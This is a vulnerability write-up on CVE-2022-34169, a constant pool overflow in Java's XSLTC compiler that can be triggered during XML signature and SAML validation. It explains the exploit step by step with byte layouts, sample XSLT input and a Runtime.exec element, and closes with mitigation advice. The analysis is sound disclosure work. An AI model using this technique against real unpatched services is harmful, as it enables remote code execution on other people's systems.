XSLTC, the XSLT compiler, is originally part of the Apache Xalan project. OpenJDK forked Xalan-J, a Java based XSLT runtime, to provide XSLT support as part of Java’s standard library. While the original Apache project has a number of features that are not supported in the OpenJDK fork, most of the core code is identical and CVE-2022-34169 affected both codebases. 


XSLTC is responsible for compiling XSLT stylesheets into Java classes to improve performance compared to a naive interpretation based approach. While this has advantages when repeatedly running the same stylesheet over large amounts of data, it is a somewhat surprising choice in the context of XML signature validation. Thinking about this from an attacker's perspective, we can now provide arbitrary inputs to a fully-featured JIT compiler. Talk about an unexpected attack surface! 


A bug in XSLTC

    /**

     * As Gregor Samsa awoke one morning from uneasy dreams he found himself

     * transformed in his bed into a gigantic insect. He was lying on his hard,

     * as it were armour plated, back, and if he lifted his head a little he

     * could see his big, brown belly divided into stiff, arched segments, on

     * top of which the bed quilt could hardly keep in position and was about

     * to slide off completely. His numerous legs, which were pitifully thin

     * compared to the rest of his bulk, waved helplessly before his eyes.

     * "What has happened to me?", he thought. It was no dream....

     */

    protected final static String DEFAULT_TRANSLET_NAME = "GregorSamsa";

Turns out that the author of this codebase was a Kafka fan. 


So what does this compilation process look like? XSLTC takes a XSLT stylesheet as input and returns a JIT'ed Java class, called translet, as output. The JVM then loads this class, constructs it and the XSLT runtime executes the transformation via a JIT'ed method. 


Java class files contain the JVM bytecode for all class methods, a so-called constant pool describing all constants used and other important runtime details such as the name of its super class or access flags. 


// https://docs.oracle.com/javase/specs/jvms/se18/html/jvms-4.html

ClassFile {

    u4             magic;

    u2             minor_version;

    u2             major_version;

    u2             constant_pool_count;

    cp_info        constant_pool[constant_pool_count-1]; // cp_info is a variable-sized object

    u2             access_flags;

    u2             this_class;

    u2             super_class;

    u2             interfaces_count;

    u2             interfaces[interfaces_count];

    u2             fields_count;

    field_info     fields[fields_count];

    u2             methods_count;

    method_info    methods[methods_count];

    u2             attributes_count;

    attribute_info attributes[attributes_count];

}


XSLTC depends on the Apache Byte Code Engineering Library (BCEL) to dynamically create Java class files. As part of the compilation process, constants in the XSLT input such as Strings or Numbers get translated into Java constants, which are then stored in the constant pool. The following code snippet shows how an XSLT integer expression gets compiled: Small integers that fit into a byte or short are stored inline in bytecode using the bipush or sipush instructions. Larger ones are added to the constant pool using the cp.addInteger method:


// org/apache/xalan/xsltc/compiler/IntExpr.java

public void translate(ClassGenerator classGen, MethodGenerator methodGen) {

        ConstantPoolGen cpg = classGen.getConstantPool();

        InstructionList il = methodGen.getInstructionList();

        il.append(new PUSH(cpg, _value));

    }

// org/apache/bcel/internal/generic/PUSH.java

public PUSH(final ConstantPoolGen cp, final int value) {

        if ((value >= -1) && (value <= 5)) {

            instruction = InstructionConst.getInstruction(Const.ICONST_0 + value);

        } else if (Instruction.isValidByte(value)) {

            instruction = new BIPUSH((byte) value);

        } else if (Instruction.isValidShort(value)) {

            instruction = new SIPUSH((short) value);

        } else {

            instruction = new LDC(cp.addInteger(value));

        }

    }


The problem with this approach is that neither XSLTC nor BCEL correctly limits the size of the constant pool. As constant_pool_count, which describes the size of the constant pool, is only 2 bytes long, its maximum size is limited to 2**16 - 1 or 65535 entries. In practice even fewer entries are possible, because some constant types take up two entries. However, BCELs internal constant pool representation uses a standard Java Array for storing constants, and does not enforce any limits on its length.

When XSLTC processes a stylesheet that contains more constants, and BCELs internal class representation is serialized to a class file at the end of the compilation process the array length is truncated to a short, but the complete array is written out:

This means that constant_pool_count will now contain a small value and that parts of the attacker-controlled constant pool will get interpreted as the class fields following the constant pool, including method and attribute definitions. 

Exploiting a constant pool overflow

To understand how we can exploit this, we first need to take a closer look at the content of the constant pool.  Each entry in the pool starts with a 1-byte tag describing the kind of constant, followed by the actual data. The table below shows an incomplete list of constant types supported by the JVM (see the official documentation for a complete list). No need to read through all of them but we will come back to this table a lot when walking through the exploit. 

Constant Kind

Tag

Description

Layout

CONSTANT_Utf8

1

Constant variable-sized UTF-8 string value

CONSTANT_Utf8_info {

    u1 tag;

    u2 length;

    u1 bytes[length];

}


CONSTANT_Integer

3

4-byte integer

CONSTANT_Integer_info {

    u1 tag;

    u4 bytes;

}


CONSTANT_Float

4

4-byte float

CONSTANT_Float_info {

    u1 tag;

    u4 bytes;

}


CONSTANT_Long

5

8-byte long

CONSTANT_Long_info {

    u1 tag;

    u4 high_bytes;

    u4 low_bytes;

}


CONSTANT_Double

6

8-byte double

CONSTANT_Double_info {

    u1 tag;

    u4 high_bytes;

    u4 low_bytes;

}

CONSTANT_Class

7

Reference to a class. Links to a Utf8 constant describing the name.

CONSTANT_Class_info {

    u1 tag;

    u2 name_index;

}


CONSTANT_String

8

A JVM “String”. Links to a UTF8 constant. 

CONSTANT_String_info {

    u1 tag;

    u2 string_index;

}


CONSTANT_Fieldref

CONSTANT_Methodref

CONSTANT_InterfaceMethodref

9

10

11

Reference to a class field or method. Links to a Class constant 

CONSTANT_Fieldref_info {

    u1 tag;

    u2 class_index;

    u2 name_and_type_index;

}


CONSTANT_Methodref_info {

    u1 tag;

    u2 class_index;

    u2 name_and_type_index;

}


CONSTANT_InterfaceMethodref_info {

    u1 tag;

    u2 class_index;

    u2 name_and_type_index;

}


CONSTANT_NameAndType

12

Describes a field or method.

CONSTANT_NameAndType_info {

    u1 tag;

    u2 name_index;

    u2 descriptor_index;

}


CONSTANT_MethodHandle

15

Describes a method handle.

 

CONSTANT_MethodHandle_info {

    u1 tag;

    u1 reference_kind;

    u2 reference_index;

}


CONSTANT_MethodType

16

Describes a method type. Points to a UTF8 constant containing a method descriptor.

CONSTANT_MethodType_info {

    u1 tag;

    u2 descriptor_index;

}



A perfect constant type for exploiting CVE-2022-34169 would be dynamically sized containing fully attacker controlled content. Unfortunately, no such type exists. While CONSTANT_Utf8 is dynamically sized, its content isn’t a raw string representation but an encoding format JVM calls “modified UTF-8”. This encoding introduces some significant restrictions on the data stored and rules out null bytes, making it mostly useless for corrupting class fields. 


The next best thing we can get is a fixed size constant type with full control over the content. CONSTANT_Long seems like an obvious candidate, but XSLTC never creates attacker-controlled long constants during the compilation process. Instead we can use large floating numbers to create CONSTANT_Double entry with (almost) fully controlled content. This gives us a nice primitive where we can corrupt class fields behind the constant pool with a byte pattern like 0x06 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0x06 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0x06 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ.


Unfortunately, this primitive alone isn’t sufficient for crafting a useful class file due to the requirements of the fields right after the constant_pool:


    cp_info        constant_pool[constant_pool_count-1];

    u2             access_flags;

    u2             this_class;

    u2             super_class;


access_flags is a big endian mask of flags describing access permissions and properties of the class. 

While the JVM is happy to ignore unknown flag values, we need to avoid setting flags like ACC_INTERFACE (0x0200) or ACC_ABSTRACT (0x0400) that result in an unusable class. This means that we can’t use a CONSTANT_Double entry as our first out-of-bound constant as its tag byte of 0x06 will get interpreted as these flags.


this_class is an index into the constant pool and has to point to a CONSTANT_Class entry that describes the class defined with this file. Fortunately, neither the JVM nor XSLTC cares much about which class we pretend to be, so this value can point to almost any CONSTANT_Class entry that XSLTC ends up generating. (The only restriction is that it can’t be a part of a protected namespace like java.lang.)


super_class is another index to a CONSTANT_Class entry in the constant pool. While the JVM is happy with any class, XSLTC expects this to be a reference to the org.apache.xalan.xsltc.runtime.AbstractTranslet class, otherwise loading and initialization of the class file fails.


After a lot of trial and error I ended up with the following approach to meet these requirements:


CONST_STRING          CONST_DOUBLE

0x08 0x07 0x02  0x06 0xXX 0xXX 0x00 0x00 0x00 0x00 0xZZ 0xZZ

access_flags  this_class   super_class  ints_count  fields_count methods_count


  1. We craft a XSLT input that results in 0x10703 constants in the pool. This will result in a truncated pool size of 0x703 and the start of the constant at index 0x703 (due to 0 based indexing) will be interpreted as access_flags.

  2. During compilation of the input, we trigger the addition of a new string constant when the pool has 0x702 constants. This will first create a CONSTANT_Utf8 entry at index 0x702 and a CONSTANT_String entry at 0x703. The String entry will reference the preceding Utf8 constant so its value will be the tag byte 0x08 followed by the index 0x07 0x02. This results in an usable access_flags value of 0x0807. 

  3. Add a CONSTANT_Double entry at index 0x704. Its 0x06 tag byte will be interpreted as part of the this_class field. The following 2 bytes can then be used to control the value of the super_class field. By setting the next 4 bytes to 0x00, we create an empty interface and fields arrays, before setting the last two bytes to the number of methods we want to define. 


The only remaining requirement is that we need to add a CONSTANT_Class entry at index 0x206 of the constant pool, which is relatively straightforward. 


The snippet below shows part of the generated XSLT input that will overwrite the first header fields. After filling the constant pool with a large number of string constants for the attribute fields and values, the CONST_STRING entry for the `jEb` element ends up at index 0x703. The XSLT function call to the `ceiling` function then triggers the addition of a controlled CONST_DOUBLE entry at index 0x704:


<jse jsf='jsg' … jDL='jDM' jDN='jDO' jDP='jDQ' jDR='jDS' jDT='jDU' jDV='jDW' jDX='jDY' jDZ='jEa' /><jEb />


<xsl:value-of select='ceiling(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008344026969402015)'/>


We constructed the initial header fields and are now in the interesting part of the class file definition: The methods table. This is where all methods of a class and their bytecode is defined. After XSLTC generates a Java class, the XSLT runtime will load the class and instantiate an object, so the easiest way to achieve arbitrary code execution is to create a malicious constructor. Let’s take a look at the methods table to see how we can define a working constructor:


ClassFile {

    [...]

    u2             methods_count;

    method_info    methods[methods_count];

    [...]

}

    

method_info {

    u2             access_flags;

    u2             name_index;

    u2             descriptor_index;

    u2             attributes_count;

    attribute_info attributes[attributes_count];

}


attribute_info {

    u2 attribute_name_index;

    u4 attribute_length;

    u1 info[attribute_length];

}



Code_attribute {

    u2 attribute_name_index;

    u4 attribute_length;

    u2 max_stack;

    u2 max_locals;

    u4 code_length;

    u1 code[code_length];

    u2 exception_table_length;

    {   u2 start_pc;

        u2 end_pc;

        u2 handler_pc;

        u2 catch_type;

    } exception_table[exception_table_length];

    u2 attributes_count;

    attribute_info attributes[attributes_count];

}



The methods table is a dynamically sized array of method_info structs. Each of these structs describes the access_flags of the method, an index into the constant table that points to its name (as a utf8 constant), and another index pointing to the method descriptor (another CONSTANT_Utf8). 

This is followed by the attributes table, a dynamically sized map from Utf8 keys stored in the constant table to dynamically sized values stored inline. Fortunately, the only attribute we need to provide is the Code attribute, which contains the actual bytecode of the method. 



Going back to our payload, we can see that the start of the methods table is aligned with the tag byte of the next entry in the constant pool table. This means that the 0x06 tag of a CONSTANT_Double will clobber the access_flag field of the first method, making it unusable for us. Instead we have to create two methods: The first one as a basic filler to get the alignment right, and the second one as the actual constructor. Fortunately, the JVM ignores unknown attributes, so we can use dynamically sized attribute values. The graphic below shows how we use a series of CONST_DOUBLE entries to create a constructor method with an almost fully controlled body.


CONST_DOUBLE: 0x06 0x01 0xXX 0xXX 0xYY 0xYY 0x00 0x01 0xZZ

CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x05 0x00 0x00 0x00 0x00

CONST_DOUBLE: 0x06 0x00 0x01 0xCC 0xCC 0xDD 0xDD 0x00 0x03

CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x00 0x04 0x00 0x00 0x00

CONST_DOUBLE: 0x06 0xCC 0xDD 0xZZ 0xZZ 0xZZ 0xZZ 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA


First Method Header

access_flags 0x0601 

name_index  0xXXXX

desc_index 0xYYYY  

attr_count 0x0001

Attribute [0]

name_index 0xZZ06

length 0x00000005

data   “\x00\x00\x00\x00\x06”


Second Method Header

access_flags 0x0001

name_index  0xCCCC -> <init>

desc_index 0xDDDD  -> ()V

attr_count 0x0003 


Attribute [0]

name_index 0x0600

length 0x00000004

data   “\x00\x00\x00\x06

Attribute [1]

name_index 0xCCDD -> Code

length 0xZZZZZZZZ

data  PAYLOAD

Attribute [2] ...



We still need to bypass one limitation: JVM bytecode does not work standalone, but references and relies on entries in the constant pool. Instantiating a class or calling a method requires a corresponding constant entry in the pool. This is a problem as our bug doesn’t give us the ability to create fake constant pool entries so we are limited to constants that XSLTC adds during compilation.


Luckily, there is a way to add arbitrary class and method references to the constant pool: Java’s XSLT runtime supports calling arbitrary Java methods. As this is clearly insecure, this functionality is protected by a runtime setting and always disabled during signature verification.

However, XSLTC will still process and compile these function calls when processing a stylesheet and the call will only be blocked during runtime (see the corresponding code in FunctionCall.java). This means that we can get references to all required methods and classes by adding a XSLT element like the one shown below:


<xsl:value-of select="rt:exec(rt:getRuntime(),'...')" xmlns:rt="java.lang.Runtime"/>



There are two final checks we need to bypass, before we end up with a working class file:

  • The JVM enforces that every constructor of a subclass, calls a superclass constructor before returning. This check can be bypassed by never returning from our constructor either by adding an endless loop at the end or throwing an exception, which is the approach I used in my exploit Proof-of-Concept. A slightly more complex, but cleaner approach is to add a reference to the AbstractTranslet constructor to the object pool and call it. This is the approach used by thanat0s in their exploit writeup.

  • Finally, we need to skip over the rest of XSLTC’s output. This can be done by constructing a single large attribute with the right size as an element in the class attribute table.



Once we chain all of this together we end up with a signed XML document that can trigger the execution of arbitrary JVM bytecode during signature verification. I’ve skipped over some implementation details of this exploit, so if you want to reproduce this vulnerability please take a look at the heavily commented  proof-of-concept script.


Impact and Restrictions

In theory every unpatched Java application that processes XML signatures is vulnerable to this exploit. However, there are two important restrictions:


As references are only processed after the signature of the SignedInfo element is verified, applications can be protected based on their usage of the KeySelector class. Applications that use a allowlist of trusted keys in their KeySelector will be protected as long as these keys are not compromised. An example of this would be a single-tenant SAML SP configured with a single trusted IdP key. In practice, a lot of these applications are still vulnerable as they don’t use KeySelector directly and will instead enforce this restriction in their own application logic after an unrestricted signature validation. At this point the vulnerability has already been triggered. Multi-tenant SAML applications that support customer-provided Identity Providers, as most modern cloud SaaS do, are also not protected by this limitation.

SAML Identity Providers can only be attacked if they support (and verify) signed SAML requests.


Even without CVE-2022-34169, processing XSLT during signature verification can be easily abused as part of a DoS attack. For this reason, the property org.jcp.xml.dsig.secureValidation can be enabled to forbid XSLT transformation in XML signatures. Interestingly this property defaults to false for all JDK versions <17, if the application is not running under the Java security manager. As the Security Manager is rarely used for server side applications and JDK 17 was only released a year ago, we expect that a lot of applications are not protected by this. Limited testing of large java-based SSO providers confirmed this assumption. Another reason for a lack of widespread usage might be that org.jcp.xml.dsig.secureValidation also disables use of the SHA1 algorithm in newer JDK versions. As SHA1 is still widely used by enterprise customers, simply enabling the property without manually configuring a suitable jdk.xml.dsig.secureValidationPolicy might not be feasible.

Conclusion

XML signatures in general and SAML in particular offer a large and complex attack surface to external attackers. Even though Java offers configuration options that can be used to address this vulnerability, they are complex, might break real-world use cases and are off by default. 


Developers that rely on SAML should make sure they understand the risks associated with it and should reduce the attack surface as much as possible by disabling functionality that is not required for their use case. Additional defense-in-depth approaches like early validation of signing keys, an allow-list based approach to valid transformation chains and strict schema validation of SAML tickets can be used for further hardening.


Kategorie: Hacking & Security